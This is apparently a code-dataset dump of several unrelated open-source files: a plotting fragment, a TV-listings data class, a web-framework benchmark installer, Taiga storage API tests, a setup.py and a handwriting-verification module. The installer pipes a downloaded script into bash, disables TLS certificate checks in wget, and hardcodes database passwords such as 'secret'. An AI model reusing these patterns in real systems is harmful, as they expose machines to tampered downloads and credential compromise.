pylab.plot(-vflux_log_h['1r'], vflux_log['1r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['1'], vflux_log['1'], label='forward')
pylab.legend(loc=0)
pylab.figure(2)
pylab.hold(0)
pylab.plot(-vflux_log_h['2r'], vflux_log['2r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['2'], vflux_log['2'], label='forward')
pylab.legend(loc=0)
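# --- Editor's note: an interpretation, not in the original source. ---
# Plotting log|gradient| of the flux against -log(h) as above is a standard
# convergence check: if the error scales like C*h**p, the curves approach
# straight lines with slope p. That reading of the script's intent is an
# assumption based only on the variable names (vflux, h).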
| gpl-3.0 | 247,746,161,481,558,900 | 32.861111 | 68 | 0.647252 | false |
astrilchuk/sd2xmltv | libschedulesdirect/common/servicecountry.py | 1 | 1174 | import logging
class ServiceCountry(object):
def __init__(self):
self.full_name = None # type: unicode
self.short_name = None # type: unicode
self.postal_code_example = None # type: unicode
self.postal_code_regex = None # type: unicode
self.one_postal_code = False # type: bool
@classmethod
def from_dict(cls, dct): # type: (dict) -> ServiceCountry
"""
:param dct:
:return:
"""
service_country = cls()
if "fullName" in dct:
service_country.full_name = dct.pop("fullName")
if "shortName" in dct:
service_country.short_name = dct.pop("shortName")
if "postalCodeExample" in dct:
service_country.postal_code_example = dct.pop("postalCodeExample")
if "postalCode" in dct:
service_country.postal_code_regex = dct.pop("postalCode")
if "onePostalCode" in dct:
service_country.onePostalCode = dct.pop("onePostalCode")
if len(dct) != 0:
logging.warn("Key(s) not processed for ServiceCountry: %s", ", ".join(dct.keys()))
return service_country
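# --- Editor's note: illustrative usage sketch, not in the original file. ---
# Building a ServiceCountry from the kind of mapping the Schedules Direct
# countries endpoint returns (the field values below are made up):
def _service_country_example():
    sc = ServiceCountry.from_dict({
        "fullName": "United States",
        "shortName": "USA",
        "postalCodeExample": "60030",
        "postalCode": "/\\d{5}/",
        "onePostalCode": False,
    })
    assert sc.short_name == "USA" and sc.one_postal_code is False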
| mit | 825,535,162,735,604,700 | 26.302326 | 94 | 0.580068 | false |
morrisonlevi/FrameworkBenchmarks | toolset/setup/linux/installer.py | 1 | 25198 | import subprocess
import os
import time
import traceback
import sys
class Installer:
############################################################
# install_software
############################################################
def install_software(self):
if self.benchmarker.install == 'all' or self.benchmarker.install == 'server':
self.__install_server_software()
if self.benchmarker.install == 'all' or self.benchmarker.install == 'database':
self.__install_database_software()
if self.benchmarker.install == 'all' or self.benchmarker.install == 'client':
self.__install_client_software()
############################################################
# End install_software
############################################################
############################################################
# __install_server_software
############################################################
def __install_server_software(self):
print("\nINSTALL: Installing server software\n")
#######################################
# Prerequisites
#######################################
self.__run_command("sudo apt-get update", True)
self.__run_command("sudo apt-get upgrade", True)
self.__run_command("sudo apt-get install build-essential libpcre3 libpcre3-dev libpcrecpp0 libssl-dev zlib1g-dev python-software-properties unzip git-core libcurl4-openssl-dev libbz2-dev libmysqlclient-dev mongodb-clients libreadline6-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev libgdbm-dev ncurses-dev automake libffi-dev htop libtool bison libevent-dev libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 liborc-0.4-0 libwxbase2.8-0 libwxgtk2.8-0 libgnutls-dev libjson0-dev libmcrypt-dev libicu-dev cmake gettext curl libpq-dev mercurial mlton", True)
self.__run_command("sudo add-apt-repository ppa:ubuntu-toolchain-r/test", True)
self.__run_command("sudo apt-get update", True)
self.__run_command("sudo apt-get install gcc-4.8 g++-4.8", True)
self.__run_command("cp ../config/benchmark_profile ../../.bash_profile")
self.__run_command("cat ../config/benchmark_profile >> ../../.profile")
self.__run_command("cat ../config/benchmark_profile >> ../../.bashrc")
self.__run_command("source ../../.profile")
self.__run_command("sudo sh -c \"echo '* - nofile 65535' >> /etc/security/limits.conf\"")
##############################################################
# System Tools
##############################################################
#
# Leiningen
#
self.__run_command("mkdir -p bin")
self.__download("https://raw.github.com/technomancy/leiningen/stable/bin/lein")
self.__run_command("mv lein bin/lein")
self.__run_command("chmod +x bin/lein")
#
# Maven
#
self.__run_command("sudo apt-get install maven -qq")
self.__run_command("mvn -version")
#######################################
# Languages
#######################################
self._install_python()
#
# Dart
#
self.__download("https://storage.googleapis.com/dart-editor-archive-integration/latest/dartsdk-linux-64.tar.gz")
self.__run_command("tar xzf dartsdk-linux-64.tar.gz")
#
# Erlang
#
self.__run_command("sudo cp ../config/erlang.list /etc/apt/sources.list.d/erlang.list")
self.__download("http://binaries.erlang-solutions.com/debian/erlang_solutions.asc")
self.__run_command("sudo apt-key add erlang_solutions.asc")
self.__run_command("sudo apt-get update")
self.__run_command("sudo apt-get install esl-erlang", True)
#
# nodejs
#
self.__download("http://nodejs.org/dist/v0.10.8/node-v0.10.8-linux-x64.tar.gz")
self.__run_command("tar xzf node-v0.10.8-linux-x64.tar.gz")
#
# Java
#
self.__run_command("sudo apt-get install openjdk-7-jdk", True)
self.__run_command("sudo apt-get remove --purge openjdk-6-jre openjdk-6-jre-headless", True)
#
# Ruby/JRuby
#
self.__run_command("curl -L get.rvm.io | bash -s head")
self.__run_command("echo rvm_auto_reload_flag=2 >> ~/.rvmrc")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm install 2.0.0-p0")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm 2.0.0-p0 do gem install bundler")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm install jruby-1.7.8")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm jruby-1.7.8 do gem install bundler")
#
# go
#
self.__download("http://go.googlecode.com/files/go1.2.linux-amd64.tar.gz");
self.__run_command("tar xzf go1.2.linux-amd64.tar.gz")
#
# Perl
#
self.__download("http://downloads.activestate.com/ActivePerl/releases/5.16.3.1603/ActivePerl-5.16.3.1603-x86_64-linux-glibc-2.3.5-296746.tar.gz");
self.__run_command("tar xzf ActivePerl-5.16.3.1603-x86_64-linux-glibc-2.3.5-296746.tar.gz");
self.__run_command("sudo ./install.sh --license-accepted --prefix /opt/ActivePerl-5.16 --no-install-html", cwd="ActivePerl-5.16.3.1603-x86_64-linux-glibc-2.3.5-296746", send_yes=True, retry=True)
self.__download("http://cpanmin.us", "cpanminus.pl")
self.__run_command("perl cpanminus.pl --sudo App::cpanminus", retry=True)
self.__run_command("cpanm -f -S DBI DBD::mysql Kelp Dancer Mojolicious Kelp::Module::JSON::XS Dancer::Plugin::Database Starman Plack JSON Web::Simple DBD::Pg JSON::XS EV HTTP::Parser::XS Monoceros EV IO::Socket::IP IO::Socket::SSL", retry=True)
#
# php
#
self.__download("http://www.php.net/get/php-5.4.13.tar.gz/from/us1.php.net/mirror")
self.__run_command("tar xzf php-5.4.13.tar.gz")
self.__run_command("./configure --with-pdo-mysql --with-mysql --with-mcrypt --enable-intl --enable-mbstring --enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --with-openssl", cwd="php-5.4.13")
self.__run_command("make", cwd="php-5.4.13")
self.__run_command("sudo make install", cwd="php-5.4.13")
self.__run_command("printf \"\\n\" | sudo pecl install apc-beta", cwd="php-5.4.13", retry=True)
self.__run_command("sudo cp ../config/php.ini /usr/local/lib/php.ini")
self.__run_command("sudo cp ../config/php-fpm.conf /usr/local/lib/php-fpm.conf")
self.__run_command("rm php-5.4.13.tar.gz")
# Composer
self.__download("https://getcomposer.org/installer", "composer-installer.php")
self.__run_command("php composer-installer.php --install-dir=bin")
# Phalcon
self.__run_command("git clone git://github.com/phalcon/cphalcon.git", retry=True)
self.__run_command("sudo ./install", cwd="cphalcon/build")
# YAF
self.__run_command("sudo pecl install yaf")
#
# Haskell
#
self.__run_command("sudo apt-get install ghc cabal-install", True)
#
# RingoJs
#
self.__download("http://www.ringojs.org/downloads/ringojs_0.9-1_all.deb")
self.__run_command("sudo apt-get install jsvc", True)
self.__run_command("sudo dpkg -i ringojs_0.9-1_all.deb", True)
self.__run_command("rm ringojs_0.9-1_all.deb")
#
# Mono
#
self.__run_command("git clone git://github.com/mono/mono", retry=True)
self.__run_command("git checkout mono-3.2.3", cwd="mono")
self.__run_command("./autogen.sh --prefix=/usr/local", cwd="mono")
self.__run_command("make get-monolite-latest", cwd="mono")
self.__run_command("make EXTERNAL_MCS=${PWD}/mcs/class/lib/monolite/gmcs.exe", cwd="mono")
self.__run_command("sudo make install", cwd="mono")
self.__run_command("mozroots --import --sync", retry=True)
self.__run_command("git clone git://github.com/mono/xsp", retry=True)
self.__run_command("./autogen.sh --prefix=/usr/local", cwd="xsp")
self.__run_command("make", cwd="xsp")
self.__run_command("sudo make install", cwd="xsp")
#
# Nimrod
#
self.__download("http://www.nimrod-code.org/download/nimrod_0.9.2.zip")
self.__run_command("unzip nimrod_0.9.2.zip")
self.__run_command("chmod +x build.sh", cwd="nimrod")
self.__run_command("./build.sh", cwd="nimrod")
self.__run_command("chmod +x install.sh", cwd="nimrod")
self.__run_command("sudo ./install.sh /usr/bin", cwd="nimrod")
#
# Racket
#
self.__run_command("sudo apt-get install racket", True)
#
# Ur/Web
#
self.__run_command("hg clone http://hg.impredicative.com/urweb/")
self.__run_command("./autogen.sh", cwd="urweb")
self.__run_command("./configure", cwd="urweb")
self.__run_command("make", cwd="urweb")
self.__run_command("sudo make install", cwd="urweb")
#######################################
# Webservers
#######################################
#
# Nginx
#
self.__download("http://nginx.org/download/nginx-1.4.1.tar.gz")
self.__run_command("tar xzf nginx-1.4.1.tar.gz")
self.__run_command("./configure", cwd="nginx-1.4.1")
self.__run_command("make", cwd="nginx-1.4.1")
self.__run_command("sudo make install", cwd="nginx-1.4.1")
#
# Openresty (nginx with openresty stuff)
#
self.__download("http://openresty.org/download/ngx_openresty-1.2.7.5.tar.gz")
self.__run_command("tar xzf ngx_openresty-1.2.7.5.tar.gz")
self.__run_command("./configure --with-luajit --with-http_postgres_module", cwd="ngx_openresty-1.2.7.5")
self.__run_command("make", cwd="ngx_openresty-1.2.7.5")
self.__run_command("sudo make install", cwd="ngx_openresty-1.2.7.5")
#
# Resin
#
self.__run_command("sudo cp -r /usr/lib/jvm/java-1.7.0-openjdk-amd64/include /usr/lib/jvm/java-1.7.0-openjdk-amd64/jre/bin/")
self.__download("http://www.caucho.com/download/resin-4.0.36.tar.gz")
self.__run_command("tar xzf resin-4.0.36.tar.gz")
self.__run_command("./configure --prefix=`pwd`", cwd="resin-4.0.36")
self.__run_command("make", cwd="resin-4.0.36")
self.__run_command("make install", cwd="resin-4.0.36")
self.__run_command("mv conf/resin.properties conf/resin.properties.orig", cwd="resin-4.0.36")
self.__run_command("cat ../config/resin.properties > resin-4.0.36/conf/resin.properties")
self.__run_command("mv conf/resin.xml conf/resin.xml.orig", cwd="resin-4.0.36")
self.__run_command("cat ../config/resin.xml > resin-4.0.36/conf/resin.xml")
##############################################################
# Frameworks
##############################################################
#
# Grails
#
self.__download("http://dist.springframework.org.s3.amazonaws.com/release/GRAILS/grails-2.3.3.zip")
self.__run_command("unzip -o grails-2.3.3.zip")
self.__run_command("rm grails-2.3.3.zip")
#
# Play 2
#
self.__download("http://downloads.typesafe.com/play/2.2.0/play-2.2.0.zip")
self.__run_command("unzip -o play-2.2.0.zip")
self.__run_command("rm play-2.2.0.zip")
#
# Play 1
#
self.__download("http://downloads.typesafe.com/releases/play-1.2.5.zip")
self.__run_command("unzip -o play-1.2.5.zip")
self.__run_command("rm play-1.2.5.zip")
self.__run_command("mv play-1.2.5/play play-1.2.5/play1")
# siena
self.__run_command("yes | play-1.2.5/play1 install siena")
#
# TreeFrog Framework
#
self.__run_command("sudo apt-get install qt4-qmake libqt4-dev libqt4-sql-mysql g++", True)
self.__download("http://downloads.sourceforge.net/project/treefrog/src/treefrog-1.7.4.tar.gz")
self.__run_command("tar xzf treefrog-1.7.4.tar.gz")
self.__run_command("rm treefrog-1.7.4.tar.gz")
self.__run_command("./configure", cwd="treefrog-1.7.4")
self.__run_command("make", cwd="treefrog-1.7.4/src")
self.__run_command("sudo make install", cwd="treefrog-1.7.4/src")
self.__run_command("make", cwd="treefrog-1.7.4/tools")
self.__run_command("sudo make install", cwd="treefrog-1.7.4/tools")
#
# Vert.x
#
self.__download("http://dl.bintray.com/vertx/downloads/vert.x-2.1M2.tar.gz?direct=true", "vert.x-2.1M2.tar.gz")
self.__run_command("tar xzf vert.x-2.1M2.tar.gz")
#
# Yesod
#
self.__run_command("cabal update", retry=True)
self.__run_command("cabal install yesod persistent-mysql", retry=True)
#
# Jester
#
self.__run_command("git clone git://github.com/dom96/jester.git jester/jester", retry=True)
print("\nINSTALL: Finished installing server software\n")
############################################################
# End __install_server_software
############################################################
def _install_python(self):
# .profile is not loaded yet, so we must use full paths.
pypy_bin = "~/FrameworkBenchmarks/installs/pypy/bin"
python_bin = "~/FrameworkBenchmarks/installs/py2/bin"
python3_bin = "~/FrameworkBenchmarks/installs/py3/bin"
def easy_install(pkg, two=True, three=False, pypy=False):
cmd = "/easy_install -ZU '" + pkg + "'"
if two: self.__run_command(python_bin + cmd, retry=True)
if three: self.__run_command(python3_bin + cmd, retry=True)
if pypy: self.__run_command(pypy_bin + cmd, retry=True)
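# e.g. easy_install('simplejson==3.3.1', two=True, three=True) installs the
# package into both the CPython 2 and CPython 3 prefixes, retrying on failure.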
self.__download("https://bitbucket.org/pypy/pypy/downloads/pypy-2.2-linux64.tar.bz2")
self.__run_command("tar xjf pypy-2.2-linux64.tar.bz2")
self.__run_command('ln -sf pypy-2.2-linux64 pypy')
self.__download("http://www.python.org/ftp/python/2.7.6/Python-2.7.6.tgz")
self.__run_command("tar xzf Python-2.7.6.tgz")
self.__download("http://www.python.org/ftp/python/3.3.2/Python-3.3.2.tar.xz")
self.__run_command("tar xJf Python-3.3.2.tar.xz")
self.__run_command("./configure --prefix=$HOME/FrameworkBenchmarks/installs/py2 --disable-shared CC=gcc-4.8", cwd="Python-2.7.6")
self.__run_command("./configure --prefix=$HOME/FrameworkBenchmarks/installs/py3 --disable-shared CC=gcc-4.8", cwd="Python-3.3.2")
self.__run_command("make -j2", cwd="Python-2.7.6")
self.__run_command("make install", cwd="Python-2.7.6")
self.__run_command("make -j2", cwd="Python-3.3.2")
self.__run_command("make install", cwd="Python-3.3.2")
self.__download("https://bitbucket.org/pypa/setuptools/downloads/ez_setup.py")
self.__run_command(pypy_bin + "/pypy ez_setup.py")
self.__run_command(python_bin + "/python ez_setup.py")
self.__run_command(python3_bin + "/python3 ez_setup.py")
easy_install('pip==1.4.1', two=True, three=True, pypy=True)
easy_install('MySQL-python==1.2.4', two=True, three=False, pypy=True)
easy_install('https://github.com/clelland/MySQL-for-Python-3/archive/master.zip', two=False, three=True, pypy=False)
easy_install('PyMySQL==0.6.1', two=True, three=True, pypy=True)
easy_install('psycopg2==2.5.1', three=True)
easy_install('simplejson==3.3.1', two=True, three=True, pypy=False)
easy_install('ujson==1.33', three=True)
easy_install('gevent==1.0')
easy_install('uwsgi', three=True) # uwsgi is released too often to pin to a single version.
# Gunicorn
easy_install('gunicorn==18', two=True, three=True, pypy=True)
# meinheld HEAD supports gunicorn worker on Python 3
easy_install('https://github.com/mopemope/meinheld/archive/master.zip', two=True, three=True, pypy=True)
# Tornado
easy_install('tornado==3.1', two=True, three=True, pypy=True)
easy_install('motor==0.1.2', two=True, three=True, pypy=True)
easy_install('pymongo==2.5.2', two=True, three=True, pypy=True)
# Django
easy_install("https://www.djangoproject.com/download/1.6/tarball/", two=True, three=True, pypy=True)
# Flask
easy_install('Werkzeug==0.9.4', two=True, three=True, pypy=True)
easy_install('flask==0.10.1', two=True, three=True, pypy=True)
easy_install('sqlalchemy==0.8.3', two=True, three=False, pypy=True)
# SQLAlchemy 0.9 supports C extension for Python 3
easy_install('https://bitbucket.org/zzzeek/sqlalchemy/downloads/SQLAlchemy-0.9.0b1.tar.gz', two=False, three=True)
easy_install('Jinja2==2.7.1', two=True, three=True, pypy=True)
easy_install('Flask-SQLAlchemy==1.0', two=True, three=True, pypy=True)
# Bottle
easy_install('bottle==0.11.6', two=True, three=True, pypy=True)
easy_install('bottle-sqlalchemy==0.4', two=True, three=True, pypy=True)
# Falcon
easy_install('Cython==0.19.2', two=True, three=True, pypy=True)
easy_install('falcon==0.1.7', two=True, three=True, pypy=True)
############################################################
# __install_error
############################################################
def __install_error(self, message):
print("\nINSTALL ERROR: %s\n" % message)
if self.benchmarker.install_error_action == 'abort':
sys.exit("Installation aborted.")
############################################################
# End __install_error
############################################################
############################################################
# __install_database_software
############################################################
def __install_database_software(self):
print("\nINSTALL: Installing database software\n")
self.__run_command("cd .. && " + self.benchmarker.database_sftp_string(batch_file="config/database_sftp_batch"), True)
remote_script = """
##############################
# Prerequisites
##############################
yes | sudo apt-get update
yes | sudo apt-get install build-essential git libev-dev libpq-dev libreadline6-dev postgresql
sudo sh -c "echo '* - nofile 65535' >> /etc/security/limits.conf"
sudo mkdir -p /ssd
sudo mkdir -p /ssd/log
##############################
# MySQL
##############################
sudo sh -c "echo mysql-server mysql-server/root_password_again select secret | debconf-set-selections"
sudo sh -c "echo mysql-server mysql-server/root_password select secret | debconf-set-selections"
yes | sudo apt-get install mysql-server
sudo stop mysql
# use the my.cnf file to overwrite /etc/mysql/my.cnf
sudo mv /etc/mysql/my.cnf /etc/mysql/my.cnf.orig
sudo mv my.cnf /etc/mysql/my.cnf
sudo cp -R -p /var/lib/mysql /ssd/
sudo cp -R -p /var/log/mysql /ssd/log
sudo cp usr.sbin.mysqld /etc/apparmor.d/
sudo /etc/init.d/apparmor reload
sudo start mysql
# Insert data
mysql -uroot -psecret < create.sql
##############################
# Postgres
##############################
sudo useradd benchmarkdbuser -p benchmarkdbpass
sudo -u postgres psql template1 < create-postgres-database.sql
sudo -u benchmarkdbuser psql hello_world < create-postgres.sql
sudo -u benchmarkdbuser psql hello_world < create-postgres-urweb.sql
sudo -u postgres -H /etc/init.d/postgresql stop
sudo mv postgresql.conf /etc/postgresql/9.1/main/postgresql.conf
sudo mv pg_hba.conf /etc/postgresql/9.1/main/pg_hba.conf
sudo cp -R -p /var/lib/postgresql/9.1/main /ssd/postgresql
sudo -u postgres -H /etc/init.d/postgresql start
sudo mv 60-postgresql-shm.conf /etc/sysctl.d/60-postgresql-shm.conf
##############################
# MongoDB
##############################
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10
sudo cp 10gen.list /etc/apt/sources.list.d/10gen.list
sudo apt-get update
yes | sudo apt-get remove mongodb-clients
yes | sudo apt-get install mongodb-10gen
sudo stop mongodb
sudo mv /etc/mongodb.conf /etc/mongodb.conf.orig
sudo mv mongodb.conf /etc/mongodb.conf
sudo cp -R -p /var/lib/mongodb /ssd/
sudo cp -R -p /var/log/mongodb /ssd/log/
sudo start mongodb
"""
print("\nINSTALL: %s" % self.benchmarker.database_ssh_string)
p = subprocess.Popen(self.benchmarker.database_ssh_string.split(" "), stdin=subprocess.PIPE)
p.communicate(remote_script)
returncode = p.returncode
if returncode != 0:
self.__install_error("status code %s running subprocess '%s'." % (returncode, self.benchmarker.database_ssh_string))
print("\nINSTALL: Finished installing database software\n")
############################################################
# End __install_database_software
############################################################
############################################################
# __install_client_software
############################################################
def __install_client_software(self):
print("\nINSTALL: Installing client software\n")
remote_script = """
##############################
# Prerequisites
##############################
yes | sudo apt-get update
yes | sudo apt-get install build-essential git libev-dev libpq-dev libreadline6-dev postgresql
sudo sh -c "echo '* - nofile 65535' >> /etc/security/limits.conf"
sudo mkdir -p /ssd
sudo mkdir -p /ssd/log
##############################
# wrk
##############################
git clone https://github.com/wg/wrk.git
cd wrk
make
sudo cp wrk /usr/local/bin
cd ~
git clone https://github.com/wg/wrk.git wrk-pipeline
cd wrk-pipeline
git checkout pipeline
make
sudo cp wrk /usr/local/bin/wrk-pipeline
cd ~
"""
print("\nINSTALL: %s" % self.benchmarker.client_ssh_string)
p = subprocess.Popen(self.benchmarker.client_ssh_string.split(" "), stdin=subprocess.PIPE)
p.communicate(remote_script)
returncode = p.returncode
if returncode != 0:
self.__install_error("status code %s running subprocess '%s'." % (returncode, self.benchmarker.client_ssh_string))
print("\nINSTALL: Finished installing client software\n")
############################################################
# End __install_client_software
############################################################
############################################################
# __run_command
############################################################
def __run_command(self, command, send_yes=False, cwd=None, retry=False):
try:
cwd = os.path.join(self.install_dir, cwd)
except AttributeError:
cwd = self.install_dir
if retry:
max_attempts = 5
else:
max_attempts = 1
attempt = 1
delay = 0
print("\nINSTALL: %s (cwd=%s)" % (command, cwd))
while True:
error_message = ""
try:
# Execute command.
if send_yes:
process = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, cwd=cwd)
process.communicate("yes")
returncode = process.returncode
if returncode:
raise subprocess.CalledProcessError(returncode, command)
else:
subprocess.check_call(command, shell=True, cwd=cwd)
break # Exit loop if successful.
except:
exceptionType, exceptionValue, exceptionTraceBack = sys.exc_info()
error_message = "".join(traceback.format_exception_only(exceptionType, exceptionValue))
print(error_message)
# Exit if there are no more attempts left.
attempt += 1
if attempt > max_attempts:
break
# Delay before next attempt.
if delay == 0:
delay = 5
else:
delay = delay * 2
print("Attempt %s/%s starting in %s seconds." % (attempt, max_attempts, delay))
time.sleep(delay)
if error_message:
self.__install_error(error_message)
############################################################
# End __run_command
############################################################
############################################################
# __bash_from_string
# Runs bash -c "command" in install_dir.
############################################################
def __bash_from_string(self, command):
self.__run_command('bash -c "%s"' % command)
############################################################
# End __bash_from_string
############################################################
############################################################
# __download
# Downloads a file from a URI.
############################################################
def __download(self, uri, filename=""):
if filename:
filename_option = "-O %s " % filename
else:
filename_option = ""
command = "wget -nv --no-check-certificate --trust-server-names %s%s" % (filename_option, uri)
self.__run_command(command, retry=True)
############################################################
# End __download
############################################################
############################################################
# __init__(benchmarker)
############################################################
def __init__(self, benchmarker):
self.benchmarker = benchmarker
self.install_dir = "installs"
try:
os.mkdir(self.install_dir)
except OSError:
pass
############################################################
# End __init__
############################################################
# vim: sw=2
| bsd-3-clause | 2,867,191,256,785,626,600 | 39.38141 | 575 | 0.567743 | false |
bdang2012/taiga-back-casting | tests/integration/test_userstorage_api.py | 1 | 7073 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# Copyright (C) 2014-2015 Anler Hernández <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
from django.core.urlresolvers import reverse
from .. import factories
from taiga.base.utils import json
pytestmark = pytest.mark.django_db
def test_list_userstorage(client):
user1 = factories.UserFactory()
user2 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
factories.StorageEntryFactory(owner=user1)
storage13 = factories.StorageEntryFactory(owner=user1)
factories.StorageEntryFactory(owner=user2)
# List by anonymous user
response = client.json.get(reverse("user-storage-list"))
assert response.status_code == 200
assert len(response.data) == 0
# List own entries
client.login(username=user1.username, password=user1.username)
response = client.json.get(reverse("user-storage-list"))
assert response.status_code == 200
assert len(response.data) == 3
client.login(username=user2.username, password=user2.username)
response = client.json.get(reverse("user-storage-list"))
assert response.status_code == 200
assert len(response.data) == 1
# Filter results by key
client.login(username=user1.username, password=user1.username)
keys = ",".join([storage11.key, storage13.key])
url = "{}?keys={}".format(reverse("user-storage-list"), keys)
response = client.json.get(url)
assert response.status_code == 200
assert len(response.data) == 2
def test_view_storage_entries(client):
user1 = factories.UserFactory()
user2 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
# Get by anonymous user
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
# Get single entry
client.login(username=user1.username, password=user1.username)
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 200
assert response.data["key"] == storage11.key
assert response.data["value"] == storage11.value
# Get a nonexistent key
client.login(username=user2.username, password=user2.username)
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
response = client.json.get(reverse("user-storage-detail", args=["foobar"]))
assert response.status_code == 404
def test_create_entries(client):
user1 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
form = {"key": "foo",
"value": {"bar": "bar"}}
form_without_key = {"value": {"bar": "bar"}}
form_without_value = {"key": "foo"}
error_form = {"key": storage11.key,
"value": {"bar": "bar"}}
# Create entry by anonymous user
response = client.json.post(reverse("user-storage-list"), json.dumps(form))
assert response.status_code == 401
# Create by logged user
client.login(username=user1.username, password=user1.username)
response = client.json.post(reverse("user-storage-list"), json.dumps(form))
assert response.status_code == 201
response = client.json.get(reverse("user-storage-detail", args=[form["key"]]))
assert response.status_code == 200
# Wrong data
client.login(username=user1.username, password=user1.username)
response = client.json.post(reverse("user-storage-list"), json.dumps(form_without_key))
assert response.status_code == 400
response = client.json.post(reverse("user-storage-list"), json.dumps(form_without_value))
assert response.status_code == 400
response = client.json.post(reverse("user-storage-list"), json.dumps(error_form))
assert response.status_code == 400
def test_update_entries(client):
user1 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
# Update by anonymous user
form = {"value": "bar", "key": storage11.key}
response = client.json.put(reverse("user-storage-detail", args=[storage11.key]),
json.dumps(form))
assert response.status_code == 401
# Update by logged user
client.login(username=user1.username, password=user1.username)
form = {"value": {"bar": "bar"}, "key": storage11.key}
response = client.json.put(reverse("user-storage-detail", args=[storage11.key]),
json.dumps(form))
assert response.status_code == 200
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 200
assert response.data["value"] == form["value"]
# Update a nonexistent entry
form = {"value": {"bar": "bar"}, "key": "foo"}
response = client.json.get(reverse("user-storage-detail", args=[form["key"]]))
assert response.status_code == 404
response = client.json.put(reverse("user-storage-detail", args=[form["key"]]),
json.dumps(form))
assert response.status_code == 201
response = client.json.get(reverse("user-storage-detail", args=[form["key"]]))
assert response.status_code == 200
assert response.data["value"] == form["value"]
def test_delete_storage_entry(client):
user1 = factories.UserFactory()
user2 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
# Delete by anonymous user
response = client.json.delete(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 401
# Delete by logged user
client.login(username=user1.username, password=user1.username)
response = client.json.delete(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 204
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
# Delete a nonexistent entry
response = client.json.delete(reverse("user-storage-detail", args=["foo"]))
assert response.status_code == 404
client.login(username=user2.username, password=user2.username)
response = client.json.delete(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
| agpl-3.0 | 6,088,007,013,867,954,000 | 39.4 | 93 | 0.695757 | false |
glomex/gcdt-lookups | setup.py | 1 | 1606 | from setuptools import setup, find_packages
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the README file
try:
import pypandoc
long_description = pypandoc.convert('README.md', format='md', to='rst')
except(IOError, ImportError):
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
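# Plain requirements feed install_requires; VCS requirements ("git+...")
# are routed to dependency_links with the "git+" prefix stripped.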
with open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if ('git+' not in x) and
(not x.startswith('#')) and (not x.startswith('-'))]
dependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' in x]
setup(
name='gcdt-lookups',
version='0.0.26',
description='Plugin (gcdt-lookups) for gcdt',
long_description=long_description,
license='MIT',
classifiers=[
'Natural Language :: English',
'Intended Audience :: Developers',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
],
keywords='',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='glomex SRE Team',
install_requires=install_requires,
dependency_links=dependency_links,
author_email='[email protected]',
entry_points={
'gcdt10': [
'lookups=gcdt_lookups.lookups',
],
}
)
| mit | -4,124,764,179,536,673,000 | 31.12 | 87 | 0.627024 | false |
bdzimmer/handwriting | handwriting/verify.py | 1 | 13242 | # -*- coding: utf-8 -*-
"""
Interactively verify predictions from algorithms so they can be used as ground
truth for evaluation or training.
"""
# Copyright (c) 2017 Ben Zimmer. All rights reserved.
# New process that uses mutable tree of Samples.
import os
import sys
import cv2
import numpy as np
from handwriting import analysisimage, annotate, driver
from handwriting import findletters, charclass, improc, util
from handwriting.prediction import Sample
def int_safe(obj, default=0):
"""safely convert something to an integer"""
try:
obj_int = int(obj)
except ValueError:
obj_int = default
return obj_int
def _image_idx(x_val, widths, hgap):
"""find the index of an image given a position, image widths, and a
horizontal gap size"""
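# e.g. widths=[10, 20], hgap=5 (hypothetical values): x_val in [0, 15)
# maps to image 0 and x_val in [15, 40) maps to image 1.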
widths = [x + hgap for x in widths]
widths_cumsum = np.cumsum([0] + widths)
return np.where(x_val >= widths_cumsum)[0][-1]
def _mutate_set_verify_recursive(sample, verified):
"""recursively set a hierarchy of samples as verified or unverified"""
sample.verified = verified
if isinstance(sample.result, Sample):
_mutate_set_verify_recursive(sample.result, verified)
elif isinstance(sample.result, list):
for samp in sample.result:
_mutate_set_verify_recursive(samp, verified)
def _verification_status_recursive(sample, verified=0, total=0):
"""recursively determine how much of the sample has been verified"""
total = total + 1
